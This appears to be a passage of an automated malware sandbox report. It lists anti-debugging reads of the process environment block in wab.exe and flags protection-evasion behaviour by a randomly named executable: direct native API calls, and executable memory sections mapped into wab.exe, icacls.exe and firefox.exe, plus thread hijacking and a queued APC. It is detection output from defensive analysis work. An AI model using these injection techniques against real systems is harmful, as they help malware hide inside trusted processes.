Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201302E1 mov eax, dword ptr fs:[00000030h] 11_2_201302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201302E1 mov eax, dword ptr fs:[00000030h] 11_2_201302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201302E1 mov eax, dword ptr fs:[00000030h] 11_2_201302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F52E2 mov eax, dword ptr fs:[00000030h] 11_2_201F52E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C310 mov ecx, dword ptr fs:[00000030h] 11_2_2011C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20140310 mov ecx, dword ptr fs:[00000030h] 11_2_20140310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A930B mov eax, dword ptr fs:[00000030h] 11_2_201A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A930B mov eax, dword ptr fs:[00000030h] 11_2_201A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A930B mov eax, dword ptr fs:[00000030h] 11_2_201A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A30B mov eax, dword ptr fs:[00000030h] 11_2_2015A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A30B mov eax, dword ptr fs:[00000030h] 11_2_2015A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A30B mov eax, dword ptr fs:[00000030h] 11_2_2015A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20117330 mov eax, dword ptr fs:[00000030h] 11_2_20117330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E132D mov eax, dword ptr fs:[00000030h] 11_2_201E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E132D mov eax, dword ptr fs:[00000030h] 11_2_201E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F32A mov eax, dword ptr fs:[00000030h] 11_2_2014F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119353 mov eax, dword ptr fs:[00000030h] 11_2_20119353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119353 mov eax, dword ptr fs:[00000030h] 11_2_20119353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov ecx, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EA352 mov eax, dword ptr fs:[00000030h] 11_2_201EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A2349 mov eax, dword ptr fs:[00000030h] 11_2_201A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D34C mov eax, dword ptr fs:[00000030h] 11_2_2011D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D34C mov eax, dword ptr fs:[00000030h] 11_2_2011D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5341 mov eax, dword ptr fs:[00000030h] 11_2_201F5341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C437C mov eax, dword ptr fs:[00000030h] 11_2_201C437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127370 mov eax, dword ptr fs:[00000030h] 11_2_20127370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127370 mov eax, dword ptr fs:[00000030h] 11_2_20127370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127370 mov eax, dword ptr fs:[00000030h] 11_2_20127370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF367 mov eax, dword ptr fs:[00000030h] 11_2_201DF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F539D mov eax, dword ptr fs:[00000030h] 11_2_201F539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20118397 mov eax, dword ptr fs:[00000030h] 11_2_20118397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20118397 mov eax, dword ptr fs:[00000030h] 11_2_20118397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20118397 mov eax, dword ptr fs:[00000030h] 11_2_20118397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2017739A mov eax, dword ptr fs:[00000030h] 11_2_2017739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2017739A mov eax, dword ptr fs:[00000030h] 11_2_2017739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E388 mov eax, dword ptr fs:[00000030h] 11_2_2011E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E388 mov eax, dword ptr fs:[00000030h] 11_2_2011E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E388 mov eax, dword ptr fs:[00000030h] 11_2_2011E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014438F mov eax, dword ptr fs:[00000030h] 11_2_2014438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014438F mov eax, dword ptr fs:[00000030h] 11_2_2014438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201433A5 mov eax, dword ptr fs:[00000030h] 11_2_201433A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201533A0 mov eax, dword ptr fs:[00000030h] 11_2_201533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201533A0 mov eax, dword ptr fs:[00000030h] 11_2_201533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB3D0 mov ecx, dword ptr fs:[00000030h] 11_2_201DB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DC3CD mov eax, dword ptr fs:[00000030h] 11_2_201DC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A3C0 mov eax, dword ptr fs:[00000030h] 11_2_2012A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201283C0 mov eax, dword ptr fs:[00000030h] 11_2_201283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F53FC mov eax, dword ptr fs:[00000030h] 11_2_201F53FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E3F0 mov eax, dword ptr fs:[00000030h] 11_2_2013E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201563FF mov eax, dword ptr fs:[00000030h] 11_2_201563FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201303E9 mov eax, dword ptr fs:[00000030h] 11_2_201303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF3E6 mov eax, dword ptr fs:[00000030h] 11_2_201DF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20158402 mov eax, dword ptr fs:[00000030h] 11_2_20158402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014340D mov eax, dword ptr fs:[00000030h] 11_2_2014340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A430 mov eax, dword ptr fs:[00000030h] 11_2_2015A430
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011E420 mov eax, dword ptr fs:[00000030h] 11_2_2011E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C427 mov eax, dword ptr fs:[00000030h] 11_2_2011C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011645D mov eax, dword ptr fs:[00000030h] 11_2_2011645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF453 mov eax, dword ptr fs:[00000030h] 11_2_201DF453
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014245A mov eax, dword ptr fs:[00000030h] 11_2_2014245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012B440 mov eax, dword ptr fs:[00000030h] 11_2_2012B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E443 mov eax, dword ptr fs:[00000030h] 11_2_2015E443
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F547F mov eax, dword ptr fs:[00000030h] 11_2_201F547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014A470 mov eax, dword ptr fs:[00000030h] 11_2_2014A470
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 mov eax, dword ptr fs:[00000030h] 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013F460 mov eax, dword ptr fs:[00000030h] 11_2_2013F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B480 mov eax, dword ptr fs:[00000030h] 11_2_2011B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20129486 mov eax, dword ptr fs:[00000030h] 11_2_20129486
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201534B0 mov eax, dword ptr fs:[00000030h] 11_2_201534B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201544B0 mov ecx, dword ptr fs:[00000030h] 11_2_201544B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201AA4B0 mov eax, dword ptr fs:[00000030h] 11_2_201AA4B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201264AB mov eax, dword ptr fs:[00000030h] 11_2_201264AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F54DB mov eax, dword ptr fs:[00000030h] 11_2_201F54DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201204E5 mov ecx, dword ptr fs:[00000030h] 11_2_201204E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201C94E0 mov eax, dword ptr fs:[00000030h] 11_2_201C94E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157505 mov eax, dword ptr fs:[00000030h] 11_2_20157505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157505 mov ecx, dword ptr fs:[00000030h] 11_2_20157505
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F4500 mov eax, dword ptr fs:[00000030h] 11_2_201F4500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D530 mov eax, dword ptr fs:[00000030h] 11_2_2015D530
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 mov eax, dword ptr fs:[00000030h] 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012D534 mov eax, dword ptr fs:[00000030h] 11_2_2012D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5537 mov eax, dword ptr fs:[00000030h] 11_2_201F5537
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E53E mov eax, dword ptr fs:[00000030h] 11_2_2014E53E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB52F mov eax, dword ptr fs:[00000030h] 11_2_201DB52F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CF525 mov eax, dword ptr fs:[00000030h] 11_2_201CF525
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20128550 mov eax, dword ptr fs:[00000030h] 11_2_20128550
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015B570 mov eax, dword ptr fs:[00000030h] 11_2_2015B570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B562 mov eax, dword ptr fs:[00000030h] 11_2_2011B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015656A mov eax, dword ptr fs:[00000030h] 11_2_2015656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E59C mov eax, dword ptr fs:[00000030h] 11_2_2015E59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201AB594 mov eax, dword ptr fs:[00000030h] 11_2_201AB594
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122582 mov eax, dword ptr fs:[00000030h] 11_2_20122582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122582 mov ecx, dword ptr fs:[00000030h] 11_2_20122582
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20154588 mov eax, dword ptr fs:[00000030h] 11_2_20154588
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011758F mov eax, dword ptr fs:[00000030h] 11_2_2011758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B35BA mov eax, dword ptr fs:[00000030h] 11_2_201B35BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF5BE mov eax, dword ptr fs:[00000030h] 11_2_201DF5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F5B0 mov eax, dword ptr fs:[00000030h] 11_2_2014F5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201445B1 mov eax, dword ptr fs:[00000030h] 11_2_201445B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A05A7 mov eax, dword ptr fs:[00000030h] 11_2_201A05A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415A9 mov eax, dword ptr fs:[00000030h] 11_2_201415A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201265D0 mov eax, dword ptr fs:[00000030h] 11_2_201265D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A5D0 mov eax, dword ptr fs:[00000030h] 11_2_2015A5D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F35D7 mov eax, dword ptr fs:[00000030h] 11_2_201F35D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201495DA mov eax, dword ptr fs:[00000030h] 11_2_201495DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201555C0 mov eax, dword ptr fs:[00000030h] 11_2_201555C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F55C9 mov eax, dword ptr fs:[00000030h] 11_2_201F55C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E5CF mov eax, dword ptr fs:[00000030h] 11_2_2015E5CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201415F4 mov eax, dword ptr fs:[00000030h] 11_2_201415F4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201225E0 mov eax, dword ptr fs:[00000030h] 11_2_201225E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014E5E7 mov eax, dword ptr fs:[00000030h] 11_2_2014E5E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015C5ED mov eax, dword ptr fs:[00000030h] 11_2_2015C5ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20123616 mov eax, dword ptr fs:[00000030h] 11_2_20123616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162619 mov eax, dword ptr fs:[00000030h] 11_2_20162619
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2019E609 mov eax, dword ptr fs:[00000030h] 11_2_2019E609
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20151607 mov eax, dword ptr fs:[00000030h] 11_2_20151607
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015F603 mov eax, dword ptr fs:[00000030h] 11_2_2015F603
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013260B mov eax, dword ptr fs:[00000030h] 11_2_2013260B

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe protection: execute and read and write
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Section loaded: NULL target: C:\Windows\SysWOW64\icacls.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe protection: read write
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\icacls.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe Thread register set: target process: 4416
Source: C:\Windows\SysWOW64\icacls.exe Thread APC queued: target process: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe
